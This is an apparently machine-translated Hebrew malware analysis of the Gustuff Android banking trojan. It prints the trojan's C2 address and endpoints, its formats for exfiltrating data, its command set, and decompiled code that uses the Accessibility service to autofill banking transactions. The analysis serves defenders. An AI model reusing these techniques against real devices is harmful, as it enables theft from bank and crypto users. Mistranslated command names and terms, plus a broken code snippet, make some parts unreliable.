איך ה-Android Trojan Gustuff מחליק את השמנת (פיאט וקריפטו) מהחשבונות שלך

רק לפני כמה ימים Group-IB מעודכן על הפעילות של Android Trojan Gustuff הנייד. הוא פועל אך ורק בשווקים בינלאומיים, תוקף לקוחות של 100 הבנקים הזרים הגדולים ביותר, משתמשים בארנקי קריפטו ניידים 32, כמו גם משאבי מסחר אלקטרוני גדולים. אבל המפתח של Gustuff הוא פושע סייבר דובר רוסית תחת הכינוי Bestoffer. עד לאחרונה, הוא שיבח את הטרויאני שלו כ"מוצר רציני לאנשים עם ידע וניסיון".

מומחה לניתוח קוד זדוני ב-Group-IB איבן פיסרב במחקר שלו, הוא מדבר בפירוט על איך Gustuff עובד ומה הסכנות שלו.

אחר מי מחפש גוסטאף?

Gustuff שייך לדור חדש של תוכנות זדוניות עם פונקציות אוטומטיות לחלוטין. לדברי המפתח, הטרויאני הפך לגרסה חדשה ומשופרת של תוכנת הזדונית AndyBot, שמאז נובמבר 2017 תוקפת טלפונים של אנדרואיד וגונבת כסף באמצעות טפסי אינטרנט דיוג המתחזה ליישומים ניידים של בנקים ומערכות תשלום בינלאומיות ידועות. בסטופר דיווח שמחיר השכירות של Gustuff Bot היה 800 דולר לחודש.

ניתוח מדגם Gustuff הראה כי הטרויאני עשוי להתמקד בלקוחות המשתמשים ביישומים ניידים של הבנקים הגדולים ביותר, כמו בנק אוף אמריקה, בנק סקוטלנד, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, כמו גם ארנקי קריפטו. ארנק ביטקוין, BitPay, Cryptopay, Coinbase וכו'.

נוצר במקור כטרויאני בנקאי קלאסי, בגרסה הנוכחית Gustuff הרחיב משמעותית את רשימת המטרות הפוטנציאליות להתקפה. בנוסף ליישומי אנדרואיד לבנקים, חברות פינטק ושירותי קריפטו, Gustuff מיועד למשתמשי אפליקציות מרקטפלייס, חנויות מקוונות, מערכות תשלום ומס'רים מידיים. בפרט, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut ואחרים.

נקודת כניסה: חישוב להדבקה המונית

Gustuff מאופיין בוקטור ה"קלאסי" של חדירה לסמארטפונים של אנדרואיד באמצעות דיוור SMS עם קישורים ל-APKs. כאשר מכשיר אנדרואיד נגוע בטרויאני בפקודת השרת, Gustuff עשוי להתפשט עוד יותר דרך מסד הנתונים של אנשי הקשר של הטלפון הנגוע או דרך מסד הנתונים של השרת. הפונקציונליות של Gustuff מיועדת להדבקה המונית ולהיוון מרבי של העסק של המפעילים שלה - יש לה פונקציית "מילוי אוטומטי" ייחודית ליישומי בנקאות ניידים לגיטימיים וארנקי קריפטו, המאפשרת לך להאיץ ולהגדיל את גניבת הכסף.

מחקר על הטרויאני הראה שפונקציית המילוי האוטומטי הוטמעה בו באמצעות שירות הנגישות, שירות לאנשים עם מוגבלויות. Gustuff אינו הטרויאני הראשון שעוקף בהצלחה את ההגנה מפני אינטראקציה עם רכיבי חלונות של יישומים אחרים המשתמשים בשירות אנדרואיד זה. עם זאת, השימוש בשירות נגישות בשילוב עם מילוי לרכב הוא עדיין נדיר למדי.

לאחר ההורדה לטלפון של הקורבן, Gustuff, באמצעות שירות הנגישות, מסוגלת ליצור אינטראקציה עם רכיבי חלונות של יישומים אחרים (בנקאות, מטבעות קריפטוגרפיים, כמו גם יישומים לקניות מקוונות, הודעות וכו'), לבצע את הפעולות הדרושות לתוקפים . לדוגמה, בפקודת השרת, סוס טרויאני יכול ללחוץ על כפתורים ולשנות את הערכים של שדות טקסט ביישומי בנקאות. שימוש במנגנון שירות הנגישות מאפשר לסוס הטרויאני לעקוף את מנגנוני האבטחה בהם השתמשו הבנקים כדי להתמודד עם סוסים טרויאניים ניידים מהדור הקודם, כמו גם שינויים במדיניות האבטחה המיושמת על ידי גוגל בגרסאות חדשות של מערכת ההפעלה אנדרואיד. לפיכך, Gustuff "יודע כיצד" להשבית את הגנת Google Protect: לפי המחבר, פונקציה זו פועלת ב-70% מהמקרים.

Gustuff יכול גם להציג התראות PUSH מזויפות עם סמלים של יישומים לגיטימיים לנייד. המשתמש לוחץ על הודעת ה-PUSH ורואה חלון פישינג שהוורד מהשרת, שם הוא מזין את נתוני כרטיס הבנק או ארנק הקריפטו המבוקש. בתרחיש אחר של Gustuff, האפליקציה שבשמה הוצגה הודעת ה-PUSH נפתחת. במקרה זה, התוכנה הזדונית, על פי פקודה מהשרת דרך שירות הנגישות, יכולה למלא את שדות הטופס של בקשה בנקאית לעסקת הונאה.

הפונקציונליות של Gustuff כוללת גם שליחת מידע על מכשיר נגוע לשרת, היכולת לקרוא/לשלוח הודעות SMS, שליחת בקשות USSD, הפעלת SOCKS5 Proxy, מעקב אחר קישור, שליחת קבצים (כולל סריקות תמונות של מסמכים, צילומי מסך, צילומים) ל- שרת, אפס את המכשיר להגדרות היצרן.

ניתוח תוכנות זדוניות

לפני התקנת אפליקציה זדונית, מערכת ההפעלה אנדרואיד מציגה למשתמש חלון המכיל רשימה של זכויות שביקשו על ידי Gustuff:

האפליקציה תותקן רק לאחר קבלת הסכמת המשתמש. לאחר הפעלת האפליקציה, הטרויאני יראה למשתמש חלון:

לאחר מכן הוא יסיר את הסמל שלו.

Gustuff נארז, לדברי המחבר, על ידי אורז מ-FTT. לאחר ההפעלה, היישום יוצר מעת לעת קשר עם שרת CnC כדי לקבל פקודות. מספר קבצים שבדקנו השתמשו בכתובת IP כשרת הבקרה 88.99.171[.]105 (להלן נסמן אותו כ <%CnC%>).

לאחר ההשקה, התוכנית מתחילה לשלוח הודעות לשרת http://<%CnC%>/api/v1/get.php.

התגובה צפויה להיות JSON בפורמט הבא:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

בכל פעם שניגשים לאפליקציה, היא שולחת מידע על המכשיר הנגוע. פורמט ההודעה מוצג להלן. ראוי לציין כי השדות מלא, נוסף, אפליקציות и רשות – אופציונלי ויישלח רק במקרה של פקודת בקשה מ-CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

אחסון נתוני תצורה

Gustuff מאחסן מידע חשוב מבחינה תפעולית בקובץ העדפות. שם הקובץ, כמו גם שמות הפרמטרים שבו, הם תוצאה של חישוב סכום MD5 מהמחרוזת 15413090667214.6.1<%name%>איפה <%name%> - שם-ערך ראשוני. פרשנות פייתון לפונקציית יצירת השם:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input) 

בהמשך נסמן אותו כ שם מחולל (קלט).
אז שם הקובץ הראשון הוא: nameGenerator("API_SERVER_LIST"), הוא מכיל ערכים עם השמות הבאים:

שם משתנה	ערך
nameGenerator("API_SERVER_LIST")	מכיל רשימה של כתובות CnC בצורה של מערך.
nameGenerator("API_SERVER_URL")	מכיל את כתובת ה-CnC.
nameGenerator("SMS_UPLOAD")	הדגל מוגדר כברירת מחדל. אם הדגל מוגדר, שולח הודעות SMS ל-CnC.
nameGenerator("SMS_ROOT_NUMBER")	מספר טלפון שאליו יישלחו הודעות SMS שיתקבלו במכשיר הנגוע. ברירת המחדל היא ריק.
nameGenerator("SMS_ROOT_NUMBER_RESEND")	הדגל נמחק כברירת מחדל. אם מותקן, כאשר מכשיר נגוע יקבל הודעת SMS, הוא יישלח למספר השורש.
nameGenerator("DEFAULT_APP_SMS")	הדגל נמחק כברירת מחדל. אם דגל זה מוגדר, האפליקציה תעבד הודעות SMS נכנסות.
nameGenerator("DEFAULT_ADMIN")	הדגל נמחק כברירת מחדל. אם הדגל מוגדר, לאפליקציה יש זכויות מנהל.
nameGenerator("DEFAULT_ACCESSIBILITY")	הדגל נמחק כברירת מחדל. אם הדגל מוגדר, שירות המשתמש בשירות הנגישות פועל.
nameGenerator("APPS_CONFIG")	אובייקט JSON המכיל רשימה של פעולות שיש לבצע כאשר מופעל אירוע נגישות המשויך לאפליקציה ספציפית.
nameGenerator("APPS_INSTALLED")	מאחסן רשימה של יישומים המותקנים במכשיר.
nameGenerator("IS_FIST_RUN")	הדגל מתאפס בהתחלה הראשונה.
nameGenerator("UNIQUE_ID")	מכיל מזהה ייחודי. נוצר כאשר הבוט מופעל בפעם הראשונה.

מודול לעיבוד פקודות מהשרת

האפליקציה מאחסנת את הכתובות של שרתי CnC בצורה של מערך מקודד על ידי בסיס בסיס שורות. ניתן לשנות את רשימת שרתי ה-CnC עם קבלת הפקודה המתאימה, ובמקרה זה הכתובות יאוחסנו בקובץ העדפות.

בתגובה לבקשה, השרת שולח פקודה לאפליקציה. ראוי לציין כי פקודות ופרמטרים מוצגים בפורמט JSON. האפליקציה יכולה לעבד את הפקודות הבאות:

קבוצה	תיאור
קדימההתחל	התחל לשלוח הודעות SMS שהתקבלו על ידי המכשיר הנגוע לשרת CnC.
קדימה עצור	הפסק לשלוח הודעות SMS שהתקבלו על ידי המכשיר הנגוע לשרת CnC.
ussdRun	בצע בקשת USSD. המספר שאליו אתה צריך לבצע בקשת USSD נמצא בשדה "מספר" של JSON.
שלח מסרון	שלח הודעת SMS אחת (במידת הצורך, ההודעה "מפוצלת" לחלקים). כפרמטר, הפקודה לוקחת אובייקט JSON המכיל את השדות "to" - מספר היעד ו-"body" - גוף ההודעה.
sendSmsAb	שלח הודעות SMS (במידת הצורך, ההודעה "מפוצלת" לחלקים) לכל מי שנמצא ברשימת אנשי הקשר של המכשיר הנגוע. המרווח בין שליחת הודעות הוא 10 שניות. גוף ההודעה נמצא בשדה JSON "body"
sendSmsMass	שלח הודעות SMS (במידת הצורך, ההודעה "מפוצלת" לחלקים) לאנשי הקשר המצוינים בפרמטרי הפקודה. המרווח בין שליחת הודעות הוא 10 שניות. כפרמטר, הפקודה לוקחת מערך JSON (שדה "sms"), שהרכיבים שלו מכילים את השדות "to" - מספר היעד ו"גוף" - גוף ההודעה.
changeServer	פקודה זו יכולה לקחת ערך עם המפתח "url" כפרמטר - ואז הבוט ישנה את הערך של nameGenerator("SERVER_URL"), או "מערך" - ואז הבוט יכתוב את המערך ל-nameGenerator ("API_SERVER_LIST"). לפיכך, האפליקציה משנה את הכתובת של שרתי ה-CnC.
adminNumber	הפקודה נועדה לעבוד עם מספר שורש. הפקודה מקבלת אובייקט JSON עם הפרמטרים הבאים: "number" - שנה שםGenerator("ROOT_NUMBER") לערך שהתקבל, "שלח מחדש" - שנה שםGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - שלח ל-nameGenerator("ROOT_NUMBER" ) מזהה ייחודי.
עדכן מידע	שלח מידע על המכשיר הנגוע לשרת.
wipeData	הפקודה נועדה למחוק נתוני משתמש. תלוי באיזה שם האפליקציה הושקה, או שהנתונים נמחקים לחלוטין עם אתחול מחדש של המכשיר (משתמש ראשי), או שרק נתוני משתמש נמחקים (משתמש משני).
socksStart	הפעל את מודול ה-Proxy. פעולת המודול מתוארת בסעיף נפרד.
גרביים סטופ	עצור את מודול ה-Proxy.
openLink	עקוב אחר הקישור. הקישור ממוקם בפרמטר JSON מתחת למפתח "url". "android.intent.action.VIEW" משמש לפתיחת הקישור.
uploadAllSms	שלח את כל הודעות ה-SMS שהמכשיר קיבל לשרת.
העלה את כל התמונות	שלח תמונות ממכשיר נגוע לכתובת URL. כתובת האתר מגיעה כפרמטר.
העלה קובץ	שלח קובץ לכתובת URL ממכשיר נגוע. כתובת האתר מגיעה כפרמטר.
העלה מספרי טלפון	שלח מספרי טלפון מרשימת אנשי הקשר שלך לשרת. אם ערך אובייקט JSON עם המפתח "ab" מתקבל כפרמטר, האפליקציה מקבלת רשימה של אנשי קשר מספר הטלפונים. אם אובייקט JSON עם המפתח "sms" מתקבל כפרמטר, האפליקציה קוראת את רשימת אנשי הקשר משולחי הודעות ה-SMS.
changeArchive	האפליקציה מורידה את הקובץ מהכתובת שמגיעה כפרמטר באמצעות מקש "url". הקובץ שהורד נשמר בשם "archive.zip". לאחר מכן, היישום יפתח את הקובץ, אופציונלי באמצעות סיסמת הארכיון "b5jXh37gxgHBrZhQ4j3D". הקבצים שנפרמו נשמרים בספריית [אחסון חיצוני]/hgps. בספרייה זו, האפליקציה מאחסנת זיופי אינטרנט (מתואר להלן).
פעולות	הפקודה נועדה לעבוד עם Action Service, המתואר בסעיף נפרד.
מבחן	לא עושה דבר.
להורדה	הפקודה נועדה להוריד קובץ משרת מרוחק ולשמור אותו בספריית "הורדות". כתובת ה-URL ושם הקובץ מגיעים כפרמטר, שדות באובייקט הפרמטר JSON, בהתאמה: "url" ו-"fileName".
להסיר	מסיר קובץ מהספרייה "הורדות". שם הקובץ מגיע בפרמטר JSON עם מקש "fileName". שם הקובץ הסטנדרטי הוא "tmp.apk".
הודעה	הצג התראה עם טקסטים של תיאור וכותרת שהוגדרו על ידי שרת הניהול.

פורמט פקודה הודעה:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

ההודעה שנוצרה על ידי הקובץ הנחקר נראית זהה להודעות שנוצרו על ידי האפליקציה שצוינה בשדה האפליקציה. אם ערך השדה אפליקציה פתוחה - נכון, כאשר נפתחת הודעה, האפליקציה המצוינת בשדה מופעלת האפליקציה. אם ערך השדה אפליקציה פתוחה - שקר, אם כן:

• נפתח חלון דיוג, שתוכנו מורידים מהספרייה <%אחסון חיצוני%>/hgps/<%filename%>
• נפתח חלון פישינג, שתוכנו מורידים מהשרת <%url%>?id=<%Bot id%>&app=<%Application name%>
• נפתח חלון דיוג, במסווה של כרטיס Google Play, עם אפשרות להזין פרטי כרטיס.

האפליקציה שולחת את התוצאה של כל פקודה אל <%CnC%>set_state.php כאובייקט JSON בפורמט הבא:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ActionsService
רשימת הפקודות שהאפליקציה מעבדת כוללת פעולה. כאשר מתקבלת פקודה, מודול עיבוד הפקודות ניגש לשירות זה כדי לבצע את הפקודה המורחבת. השירות מקבל אובייקט JSON כפרמטר. השירות יכול לבצע את הפקודות הבאות:

1. PARAMS_ACTION - בעת קבלת פקודה כזו, השירות מקבל תחילה מפרמטר JSON את הערך של מפתח Type, שיכול להיות כדלקמן:

• serviceInfo - פקודת המשנה מקבלת את הערך לפי מפתח מפרמטר JSON includeNotImportant. אם הדגל הוא True, האפליקציה מגדירה את הדגל FLAG_ISOLATED_PROCESS לשירות המשתמש בשירות הנגישות. כך השירות יושק בתהליך נפרד.
• שורש - קבל ושלח לשרת מידע על החלון שנמצא כעת בפוקוס. האפליקציה משיגה מידע באמצעות המחלקה AccessibilityNodeInfo.
• מנהל - בקש זכויות מנהל.
• עיכוב - להשעות את ActionsService למספר האלפיות שצוין בפרמטר עבור מפתח "נתונים".
• חלונות - שלח רשימה של חלונות גלויים למשתמש.
• להתקין - התקן את האפליקציה במכשיר הנגוע. שם חבילת הארכיון נמצא במקש "שם קובץ". הארכיון עצמו ממוקם בספריית ההורדות.
• גלוֹבָּלִי - פקודת המשנה נועדה לנווט מהחלון הנוכחי:
  • בתפריט ההגדרות המהירות
  • אחורה
  • בית
  • להתראות
  • לחלון היישומים שנפתח לאחרונה

• לשגר - הפעל את האפליקציה. שם האפליקציה מגיע כפרמטר לפי מפתח נתונים.
• צלילים - שנה את מצב הקול לשקט.
• לפתוח - מדליק את התאורה האחורית של המסך והמקלדת לבהירות מלאה. האפליקציה מבצעת פעולה זו באמצעות WakeLock, ומציינת את המחרוזת [תווית האפליקציה]:INFO כתג
• permissionOverlay — הפונקציה לא מיושמת (התגובה לביצוע הפקודה היא {"message":"Not support"} או {"message":"low sdk"})
• מחווה — הפונקציה אינה מיושמת (התגובה לביצוע הפקודה היא {"message":"Not support"}או {"message":"Low API"})
• הרשאות - פקודה זו נחוצה כדי לבקש הרשאות עבור היישום. עם זאת, פונקציית השאילתה אינה מיושמת, כך שהפקודה חסרת משמעות. רשימת הזכויות המבוקשות מגיעה כמערך JSON עם מקש "הרשאות". רשימה סטנדרטית:
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_CONTACTS
  • android.permission.CALL_PHONE
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.READ_SMS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.WRITE_EXTERNAL_STORAGE

• לפתוח - הצג חלון דיוג. בהתאם לפרמטר המגיע מהשרת, האפליקציה עשויה להציג את חלונות ההתחזות הבאים:
  • הצג חלון דיוג שתוכנו כתוב בקובץ בספריה <%ספרייה חיצונית%>/hgps/<%param_filename%>. תוצאת האינטראקציה של המשתמש עם החלון תישלח אל <%CnC%>/records.php
  • הצג חלון דיוג שהתוכן שלו נטען מראש מהכתובת <%url_param%>?id=<%bot_id%>&app=<%packagename%>. תוצאת האינטראקציה של המשתמש עם החלון תישלח אל <%CnC%>/records.php
  • הצג חלון דיוג במסווה של כרטיס Google Play.

• אינטראקטיבי - הפקודה נועדה לקיים אינטראקציה עם רכיבי חלון של יישומים אחרים באמצעות AcessibilityService. שירות מיוחד הופעל בתוכנית לאינטראקציה. האפליקציה הנחקרת יכולה ליצור אינטראקציה עם חלונות:
  • פעיל כרגע. במקרה זה, הפרמטר מכיל את המזהה או הטקסט (שם) של האובייקט שאיתו אתה צריך לקיים אינטראקציה.
  • גלוי למשתמש בזמן ביצוע הפקודה. היישום בוחר חלונות לפי מזהה.

  לאחר קבלת חפצים AccessibilityNodeInfo עבור רכיבי חלון מעניינים, האפליקציה, בהתאם לפרמטרים, יכולה לבצע את הפעולות הבאות:

  • פוקוס - הגדר את המיקוד לאובייקט.
  • לחץ - לחץ על אובייקט.
  • actionId - בצע פעולה לפי ID.
  • setText - שנה את הטקסט של אובייקט. שינוי הטקסט אפשרי בשתי דרכים: ביצוע פעולה ACTION_SET_TEXT (אם גרסת האנדרואיד של המכשיר הנגוע צעירה או שווה ל LOLLIPOP), או על ידי הנחת מחרוזת על הלוח והדבקה באובייקט (לגרסאות ישנות יותר). ניתן להשתמש בפקודה זו כדי לשנות נתונים באפליקציה בנקאית.

2. PARAMS_ACTIONS - כמו PARAMS_ACTION, מגיע רק מערך JSON של פקודות.

נראה שאנשים רבים יתעניינו כיצד נראית הפונקציה של אינטראקציה עם רכיבי חלון של אפליקציה אחרת. כך מיושמת הפונקציונליות הזו ב-Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

פונקציית החלפת טקסט:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

כך, עם תצורה נכונה של שרת הבקרה, Gustuff מסוגלת למלא שדות טקסט באפליקציית הבנקאות וללחוץ על הכפתורים הדרושים להשלמת העסקה. הטרויאני אפילו לא צריך להיכנס לאפליקציה - מספיק לשלוח פקודה כדי להציג הודעת PUSH ואז לפתוח את אפליקציית הבנקאות שהותקנה קודם לכן. המשתמש יאמת את עצמו, ולאחר מכן יוכל Gustuff למלא את המכונית.

מודול עיבוד הודעות SMS

היישום מתקין מטפל באירועים עבור המכשיר הנגוע כדי לקבל הודעות SMS. האפליקציה הנבדקת יכולה לקבל פקודות מהמפעיל, המגיעות בגוף הודעת ה-SMS. הפקודות מגיעות בפורמט:

7!5=<פקודה מקודדת%Base64%>

האפליקציה מחפשת את המחרוזת בכל הודעות ה-SMS הנכנסות 7!5=, כאשר מחרוזת מזוהה, הוא מפענח את המחרוזת מ-Base64 בהיסט 4 ומבצע את הפקודה. הפקודות דומות לאלו עם CnC. תוצאת הביצוע נשלחת לאותו מספר שממנו הגיעה הפקודה. פורמט תגובה:

7*5=<קידוד%Base64 של "פקודה תוצאה_קוד"%>

לחלופין, האפליקציה יכולה לשלוח את כל ההודעות שהתקבלו למספר השורש. לשם כך, יש לציין את מספר השורש בקובץ ההעדפות ולהגדיר את דגל הפניית ההודעה. הודעת SMS נשלחת למספר של התוקף בפורמט:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

כמו כן, לחלופין, האפליקציה יכולה לשלוח הודעות ל-CnC. הודעת ה-SMS נשלחת לשרת בפורמט JSON:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

אם הדגל מוגדר nameGenerator("DEFAULT_APP_SMS") – האפליקציה מפסיקה לעבד את הודעת ה-SMS ומנקה את רשימת ההודעות הנכנסות.

מודול פרוקסי

האפליקציה הנבדקת מכילה מודול Backconnect Proxy (להלן מודול Proxy), בעל מחלקה נפרדת הכוללת שדות סטטיים עם תצורה. נתוני התצורה מאוחסנים בדוגמה בצורה ברורה:

כל הפעולות שבוצעו על ידי מודול ה-Proxy מחוברות לקבצים. לשם כך, האפליקציה ב-External Storage יוצרת ספרייה בשם "logs" (השדה ProxyConfigClass.logsDir במחלקת התצורה), שבה מאוחסנים קבצי יומן. רישום מתרחש בקבצים עם שמות:

1. main.txt - העבודה של המחלקה שנקראת CommandServer מחוברת לקובץ זה. בהמשך, רישום המחרוזת str לקובץ זה יסומן כ-mainLog(str).
2. session-<%id%>.txt - קובץ זה שומר נתוני יומן הקשורים להפעלת פרוקסי ספציפית. בהמשך, רישום המחרוזת str לקובץ זה יסומן כ-sessionLog (str).
3. server.txt - קובץ זה משמש לתיעוד כל הנתונים שנכתבו לקבצים המתוארים לעיל.

פורמט נתוני יומן:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

חריגים המתרחשים במהלך פעולת מודול ה-Proxy נרשמות גם לקובץ. לשם כך, היישום יוצר אובייקט JSON בפורמט הבא:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

לאחר מכן הוא ממיר אותו לייצוג מחרוזת ומתעד אותו.

מודול ה-Proxy מופעל לאחר קבלת הפקודה המתאימה. כאשר מתקבלת פקודה להפעלת מודול ה-Proxy, האפליקציה מפעילה שירות שנקרא MainService, שאחראית על ניהול פעולת מודול ה-Proxy - הפעלתו ועצירתו.

שלבי תחילת השירות:

1. מפעיל טיימר שפועל פעם בדקה ובודק את הפעילות של מודול ה-Proxy. אם המודול אינו פעיל, הוא מפעיל אותו.
גם כאשר האירוע מופעל android.net.conn.CONNECTIVITY_CHANGE מודול ה-Proxy מופעל.

2. האפליקציה יוצרת Wake-lock עם הפרמטר PARTIAL_WAKE_LOCK ותופס אותו. זה מונע מהמעבד של המכשיר לעבור למצב שינה.

3. מפעיל את מחלקת עיבוד הפקודות של מודול ה-Proxy, תחילה רושם את השורה mainLog("התחל שרת") и

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

איפה proxy_cnc, command_port ו-proxy_port – פרמטרים המתקבלים מתצורת שרת ה-Proxy.

מחלקת עיבוד הפקודות נקראת CommandConnection. מיד לאחר ההפעלה, מבצע את הפעולות הבאות:

4. מתחבר ל ProxyConfigClass.host: ProxyConfigClass.commandPort ושולח נתונים על המכשיר הנגוע לשם בפורמט JSON:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

איפה:

• id - מזהה, מנסה לקבל ערך עם השדה "id" מקובץ העדפות משותפות בשם "x". אם לא ניתן היה להשיג ערך זה, הוא יוצר ערך חדש. לפיכך, למודול ה-Proxy יש מזהה משלו, אשר נוצר בדומה למזהה הבוט.
• imei - IMEI של המכשיר. אם אירעה שגיאה במהלך תהליך קבלת הערך, במקום שדה זה תיכתב הודעת טקסט שגיאה.
• imsi - זהות מנוי סלולרי בינלאומי של המכשיר. אם אירעה שגיאה במהלך תהליך קבלת הערך, במקום שדה זה תיכתב הודעת טקסט שגיאה.
• דגם - השם הגלוי למשתמש הקצה של המוצר הסופי.
• יצרן - היצרן של המוצר/חומרה (Build.MANUFACTURER).
• androidVersion - מחרוזת בפורמט "<%release_version%> (<%os_version%>),<%sdk_version%>"
• מדינה - המיקום הנוכחי של המכשיר.
• partnerId הוא מחרוזת ריקה.
• packageName - שם חבילה.
• networkType - סוג חיבור הרשת הנוכחי (לדוגמה: "WIFI", "מובייל"). במקרה של שגיאה, מחזירה null.
• hasGsmSupport - נכון - אם הטלפון תומך ב-GSM, אחרת לא נכון.
• simReady - מצב כרטיס ה-SIM.
• simCountry - קוד מדינה ISO (מבוסס על ספק כרטיס ה-SIM).
• networkOperator — שם מפעיל. אם אירעה שגיאה במהלך תהליך קבלת הערך, במקום שדה זה תיכתב הודעת טקסט שגיאה.
• simOperator - שם ספק השירות (SPN). אם אירעה שגיאה במהלך תהליך קבלת הערך, במקום שדה זה תיכתב הודעת טקסט שגיאה.
• גרסה - שדה זה מאוחסן במחלקת התצורה; עבור הגרסאות שנבדקו של הבוט זה היה שווה ל-"1.6".

5. עובר למצב המתנה לפקודות מהשרת. פקודות מהשרת מגיעות בפורמט:

• 0 היסט - פקודה
• היסט 1 - זיהוי הפעלה
• 2 אופסט - אורך
• 4 היסט - נתונים

כאשר מגיעה פקודה, האפליקציה מתעדת:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

הפקודות הבאות מהשרת אפשריות:

שם	פיקוד	נתונים	תיאור
connectionId	0	מזהה חיבור	צור קשר חדש
לישון	3	זְמַן	השהה את מודול ה-Proxy
פינג פונג	4	-	שלח הודעת PONG

הודעת PONG מורכבת מ-4 בתים ונראית כך: 0x04000000.

כאשר הפקודה connectionId מתקבלת (כדי ליצור חיבור חדש) CommandConnection יוצר מופע של מחלקה ProxyConnection.

